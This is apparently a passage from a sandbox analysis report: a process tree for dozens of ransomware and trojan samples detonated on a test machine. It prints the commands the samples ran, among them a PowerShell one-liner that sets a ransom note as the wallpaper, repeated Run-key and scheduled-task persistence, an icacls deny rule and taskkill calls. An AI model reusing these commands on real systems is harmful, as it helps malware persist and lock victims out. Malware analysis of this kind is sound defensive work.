    HEUR-Trojan-Ransom.Win32.Cryptoff.vho-ff48c2bbe7041e51d80d645ab33f62be643c85500bba8705c23f19c36f6b09e1.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:5144
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Cryptor.gen-a1b504b8e34200d8029f6d75491d517e460162cb9df438257ee4ed85f61c18bc.exe
    HEUR-Trojan-Ransom.Win32.Cryptor.gen-a1b504b8e34200d8029f6d75491d517e460162cb9df438257ee4ed85f61c18bc.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5716
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7344
    - - C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\225480302.png /f
        5⤵
        
        PID:3032
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
        5⤵
        
        PID:8172
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Foreign.gen-77525158fc61a08878ee96643ed0ec90b2802149074c62ebc71e32e916cd1990.exe
    HEUR-Trojan-Ransom.Win32.Foreign.gen-77525158fc61a08878ee96643ed0ec90b2802149074c62ebc71e32e916cd1990.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5556
  - - C:\Windows\94000696690303050\winsvcs.exe
      C:\Windows\94000696690303050\winsvcs.exe
      4⤵
      PID:7784
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-2c845b259264a23fa465cb59c422fd851c95dd92b5d26d2cec867085623e18df.exe
    HEUR-Trojan-Ransom.Win32.Generic-2c845b259264a23fa465cb59c422fd851c95dd92b5d26d2cec867085623e18df.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5800
  - - C:\Users\Admin\AppData\Roaming\important files.exe
      "C:\Users\Admin\AppData\Roaming\important files.exe" C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-2c845b259264a23fa465cb59c422fd851c95dd92b5d26d2cec867085623e18df.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:872
    - - C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe" unk
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7272
      - C:\Users\Admin\AppData\Roaming\Windows Objects\wmihostwin.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Objects\wmihostwin.exe" unk2
        6⤵
        
        PID:7520
        
        C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe" unk3
        7⤵
        
        PID:7604
        
        C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure.exe" execute
        8⤵
        
        PID:7696
        
        C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe" autorun
        8⤵
        
        PID:7760
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:3640
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:6160
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:8800
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:6400
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:6396
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:6312
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:2320
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:1396
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:8364
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:7204
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:4304
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:8536
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:4540
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:5080
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:9168
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:8016
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:5664
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:7136
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:6444
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:4068
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:8280
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:7720
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:8844
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:8672
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:7572
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:5332
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:8980
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:2480
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:6716
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:7072
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:7176
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:760
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:7992
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:8676
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:6016
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:6424
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:8804
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:1868
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:6608
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:8284
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:1520
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:6888
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:1804
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:5600
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:6256
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:3472
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:7204
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:4416
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:8752
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-3044e01a1877af43c81c2585f2dc9842d9c9a562da13e215e5197a0142eb825f.exe
    HEUR-Trojan-Ransom.Win32.Generic-3044e01a1877af43c81c2585f2dc9842d9c9a562da13e215e5197a0142eb825f.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5808
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-75f14fff0b30ca2658fa6824459ebc5d9ff31463bb44e33856d1e33d3db24c53.exe
    HEUR-Trojan-Ransom.Win32.Generic-75f14fff0b30ca2658fa6824459ebc5d9ff31463bb44e33856d1e33d3db24c53.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5816
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-d2cec9aaa304bffab0fa9359abb6d4a64c62e2c3ebc78fbda5947b766040cc78.exe
    HEUR-Trojan-Ransom.Win32.Generic-d2cec9aaa304bffab0fa9359abb6d4a64c62e2c3ebc78fbda5947b766040cc78.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4984
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-d74b85d646feda822c37e75a040d6f78c5bb77a2bff573cd1b979a6cee24e14a.exe
    HEUR-Trojan-Ransom.Win32.Generic-d74b85d646feda822c37e75a040d6f78c5bb77a2bff573cd1b979a6cee24e14a.exe
    3⤵
    - Executes dropped EXE
    PID:3360
  - - C:\Users\Admin\AppData\Local\Temp\Clickermann.exe
      "C:\Users\Admin\AppData\Local\Temp\Clickermann.exe"
      4⤵
      PID:2304
    - - C:\Users\Admin\AppData\Local\Temp\чит.exe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\чит.exe.exe"
        5⤵
        
        PID:2204
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-d8734950116b8058dc8c585234743b956b910cf9e9342cd18b9aaea60e863413.exe
    HEUR-Trojan-Ransom.Win32.Generic-d8734950116b8058dc8c585234743b956b910cf9e9342cd18b9aaea60e863413.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:7260
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Generic-eee2c2013ccae9a42d281f1fb2515b422da0b690f7b0c2a67753dde366754e35.exe
    HEUR-Trojan-Ransom.Win32.Generic-eee2c2013ccae9a42d281f1fb2515b422da0b690f7b0c2a67753dde366754e35.exe
    3⤵
    PID:7684
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
    HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
    3⤵
    PID:5704
  - - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
      HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
      4⤵
      PID:7864
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Users\Admin\AppData\Local\16c1003b-816c-457b-b10c-d0fbd651148b" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        5⤵
        Modifies file permissions
        
        PID:2984
    - - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
        
        "C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:968
      - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe
        
        "C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Stop.gen-a3121984cecddff33f8f6b01a06d18b314d50deab85cbfbc5657a0720f61f56e.exe" --Admin IsNotAutoStart IsNotTask
        6⤵
        
        PID:8244
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-083dbc12b101020fc3a3391de52133589d2d07eeb526e9d6fb7e8452b326119f.exe
    HEUR-Trojan.MSIL.Crypt.gen-083dbc12b101020fc3a3391de52133589d2d07eeb526e9d6fb7e8452b326119f.exe
    3⤵
    PID:6236
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-1dc1a41ffe0e5478df5e628ff818e5abb06fba2b879549ccdb7f810e84d65f18.exe
    HEUR-Trojan.MSIL.Crypt.gen-1dc1a41ffe0e5478df5e628ff818e5abb06fba2b879549ccdb7f810e84d65f18.exe
    3⤵
    PID:5808
  - - C:\Windows\SysWOW64\TASKKILL.exe
      TASKKILL /F /IM wscript.exe
      4⤵
      Kills process with taskkill
      PID:2868
  - - C:\Windows\SysWOW64\TASKKILL.exe
      TASKKILL /F /IM cmd.exe
      4⤵
      Kills process with taskkill
      PID:1124
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Delete /tn NYAN /F
      4⤵
      PID:8112
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn NYAN /tr "C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-1dc1a41ffe0e5478df5e628ff818e5abb06fba2b879549ccdb7f810e84d65f18.exe" /sc minute /mo 1
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6164
  - - C:\Users\Admin\AppData\Local\Temp\Client.exe
      "C:\Users\Admin\AppData\Local\Temp\Client.exe"
      4⤵
      PID:6916
    - - C:\Windows\SysWOW64\TASKKILL.exe
        
        TASKKILL /F /IM wscript.exe
        5⤵
        Kills process with taskkill
        
        PID:3704
    - - C:\Windows\SysWOW64\TASKKILL.exe
        
        TASKKILL /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        
        PID:8084
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /tn NYAN /F
        5⤵
        
        PID:2600
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn NYAN /tr "C:\Users\Admin\AppData\Local\Temp\Client.exe" /sc minute /mo 1
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8272
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-2243db692345300fa85044165d51f647130d7ad6073c1560b11788bc86cad760.exe
    HEUR-Trojan.MSIL.Crypt.gen-2243db692345300fa85044165d51f647130d7ad6073c1560b11788bc86cad760.exe
    3⤵
    PID:7020
  - - C:\Users\Admin\AppData\Local\Temp\4cf45a43-5c69-4117-9960-a5763c5fa241.exe
      "C:\Users\Admin\AppData\Local\Temp\4cf45a43-5c69-4117-9960-a5763c5fa241.exe"
      4⤵
      PID:5604
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-24d6bdcc1fd603ed16d96146e9dd9c3c876c19f70a0b262de431e5c333b43d49.exe
    HEUR-Trojan.MSIL.Crypt.gen-24d6bdcc1fd603ed16d96146e9dd9c3c876c19f70a0b262de431e5c333b43d49.exe
    3⤵
    PID:5264
  - - C:\Users\Admin\AppData\Roaming\model\print.exe
      "C:\Users\Admin\AppData\Roaming\model\print.exe"
      4⤵
      PID:6344
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:6800
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-26e821bcc82ab2a0ca1415d7b1b33d09dcf9ca7a5b8bb53376804493367257ff.exe
    HEUR-Trojan.MSIL.Crypt.gen-26e821bcc82ab2a0ca1415d7b1b33d09dcf9ca7a5b8bb53376804493367257ff.exe
    3⤵
    PID:8048
